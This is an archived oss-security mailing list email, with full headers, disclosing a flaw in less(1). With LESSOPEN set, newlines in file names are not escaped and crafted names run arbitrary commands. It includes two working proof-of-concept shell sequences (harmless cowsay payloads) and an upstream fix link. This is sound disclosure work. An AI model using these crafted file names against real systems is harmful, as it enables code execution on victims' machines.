Received: by 2002:ab2:7041:0:b0:1f4:bcc8:f211 with SMTP id x1csp104840lql; Fri, 12 Apr 2024 05:21:19 -0700 (PDT) X-Forwarded-Encrypted: i=2; AJvYcCVZDAsSw+eyvyRgz+Istz06SA1t+1DkcvmIpnbniS1jK5iou1JcRDw/XyMqbBeqvwfnLe6dJB1Ba2cbrjTpVN8py3vtg8rEDqTDPGoeEQ== X-Google-Smtp-Source: AGHT+IGpWKGgjtuS0ZLT/yFqmspNCuJijSbmmsoVTyJp4Ib7NKfEhRje3Q3TuAZZpQ8yJXHWGBb0 X-Received: by 2002:a0c:f649:0:b0:69b:46e8:ce3d with SMTP id s9-20020a0cf649000000b0069b46e8ce3dmr2357244qvm.42.1712924479101; Fri, 12 Apr 2024 05:21:19 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1712924479; cv=none; d=google.com; s=arc-20160816; b=J0xYgICIWbJ3BgRH2OWQyqZ46zPt/5zJS+v2kjOfdy/HUAC0lJgE6Kc27fQvGhsB5o 5vAkrCaJH+ExTyJcR4AVQqkpWdmjORggqAR+WWJdeAYmRjy7YWjBt182UPNd+L4FR+O9 3UVFobPRzD7sgfamj/J4/up769cfoKnFaZaYrhRvyP2hcXAfOARB1wGEoNc81puoKr34 9HsuvB5vWFtluJ+KGnX03t1kWHqLBUwDgIjErzkip2g7NwezHidNtkf+gGLCbfkXjvS9 31WQKfFzgbHffBnoU+w7PgKZttT2qz257bK3EqCCB9GiG8P7mJWXJ8fxIexjVqgH56LG tGJw== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=subject:content-disposition:mime-version:mail-followup-to :message-id:to:from:date:delivered-to:reply-to:list-id :list-subscribe:list-unsubscribe:list-help:list-post:precedence :mailing-list; bh=+gY6Q5DL3TlfYRrGUEAWvm/UzW7MOXpUmJlxDdWF3Rc=; fh=qBhSZbkMeWnNDPc3y+ghxxcqsFJk1NM0fUuz8SqoieA=; b=LsocmBnFNAFWfj/2QKn2lOHII3VK+41T9XpLFzZMoR0Oxjc7YYQOAp4t7JJ1/T9RQL WaE/wC3XXD/a4V4msIOCugu9vxc50no3cU6862J0MLuMZb8yS9KpHVYCLKuEpEwGDslN UVe4VnWstH7+sGBK42iJj2Mm7fkU6FkXZMBv1d84aShN4/QejYwttegqAJnp0czR1AxD dpRvhIGXWRhatDKWTf35Qf4EOlVMf7JeZBI8uvDrTbzGazMvWMU43wUBTCuQ6kEMVPRi K5GzHeqpMBaqSa8tu3LrDQKY7ihPi/Wlhkaa5p4BuDmUAAuK1AC6GYQ2/1kLxinQNAZf sHKQ==; dara=google.com ARC-Authentication-Results: i=1; mx.google.com; spf=pass (google.com: domain of oss-security-return-30016-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) smtp.mailfrom="oss-security-return-30016-linux.lists.archive=gmail.com@lists.openwall.com" Return-Path: Received: from second.openwall.net (second.openwall.net. [193.110.157.125]) by mx.google.com with SMTP id dn18-20020a056214095200b006993a1f57a3si3454194qvb.151.2024.04.12.05.21.18 for ; Fri, 12 Apr 2024 05:21:19 -0700 (PDT) Received-SPF: pass (google.com: domain of oss-security-return-30016-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) client-ip=193.110.157.125; Authentication-Results: mx.google.com; spf=pass (google.com: domain of oss-security-return-30016-linux.lists.archive=gmail.com@lists.openwall.com designates 193.110.157.125 as permitted sender) smtp.mailfrom="oss-security-return-30016-linux.lists.archive=gmail.com@lists.openwall.com" Received: (qmail 28142 invoked by uid 550); 12 Apr 2024 12:20:59 -0000 Mailing-List: contact oss-security-help@lists.openwall.com; run by ezmlm Precedence: bulk List-Post: List-Help: List-Unsubscribe: List-Subscribe: List-ID: Reply-To: oss-security@lists.openwall.com Delivered-To: mailing list oss-security@lists.openwall.com Received: (qmail 28109 invoked from network); 12 Apr 2024 12:20:59 -0000 Authentication-Results: garm.ovh; auth=pass (GARM-98R0027b678fbc-eca2-4727-846d-3d3eff6f30fa, 85A3E892C6963C1368CED7EEBE9CFA9DF350C9AD) smtp.auth=jwilk@jwilk.net X-OVh-ClientIp: 31.0.177.245 Date: Fri, 12 Apr 2024 14:20:31 +0200 From: Jakub Wilk To: Message-ID: <20240412122031.pt2sx6rasca3mgpu@jwilk.net> Mail-Followup-To: oss-security@lists.openwall.com MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Content-Disposition: inline X-Originating-IP: [37.59.142.98] X-ClientProxiedBy: DAG5EX1.mxp6.local (172.16.2.41) To DAG4EX1.mxp6.local (172.16.2.31) X-Ovh-Tracer-GUID: 1ad401fd-430d-4524-9b7b-9db22b9190db X-Ovh-Tracer-Id: 2815312718239553303 X-VR-SPAMSTATE: OK X-VR-SPAMSCORE: 0 X-VR-SPAMCAUSE: gggruggvucftvghtrhhoucdtuddrgedvledrudeiuddghedtucetufdoteggodetrfdotffvucfrrhhofhhilhgvmecuqfggjfdpvefjgfevmfevgfenuceurghilhhouhhtmecuhedttdenucenucfjughrpeffhffvuffkgggtughisehttdertddttddvnecuhfhrohhmpeflrghkuhgsucghihhlkhcuoehjfihilhhksehjfihilhhkrdhnvghtqeenucggtffrrghtthgvrhhnpeehvdeffefgkedvieegteeitdelvdeltdefvdffgefhvdfgkeetffejvdeifefhieenucffohhmrghinhepghhithhhuhgsrdgtohhmnecukfhppeduvdejrddtrddtrddupdefjedrheelrddugedvrdelkedpfedurddtrddujeejrddvgeehnecuvehluhhsthgvrhfuihiivgeptdenucfrrghrrghmpehinhgvthepuddvjedrtddrtddruddpmhgrihhlfhhrohhmpehjfihilhhksehjfihilhhkrdhnvghtpdhnsggprhgtphhtthhopedupdhrtghpthhtohepohhsshdqshgvtghurhhithihsehlihhsthhsrdhophgvnhifrghllhdrtghomhdpoffvtefjohhsthepmhhoheegkedpmhhouggvpehsmhhtphhouhht Subject: [oss-security] less(1) with LESSOPEN mishandles \n in paths less(1) does not correctly escape newlines in pathnames when constructing command line of the input preprocessor. If a user ran less(1) on files with untrusted names, this could result in execution of arbitrary code. The input preprocessor is enabled by the LESSOPEN environment variable. But if you didn't set it, don't worry, because zless(1) (or xzless(1), or zstdless(1)) sets it for you: $ echo 'cowsay pwned' > './\' && touch "$(printf '\n|sh')" $ zless ./* _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ./ |sh (file 1 of 2) (END) - Next: ./\ On Ubuntu systems, $LESSOPEN is set in ~/.bashrc by default, so the bug can be exploited even without the wrapper: $ mkdir m "$(printf '\n|m')" && touch "$(printf '\n|m/oo')" && echo 'cowsay pwned' > m/oo && chmod +x m/oo $ less ./*/* _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ./ |m/oo (file 1 of 2) (END) - Next: ./m/oo Upstream fix: https://github.com/gwsw/less/commit/007521ac3c95bc76 -- Jakub Wilk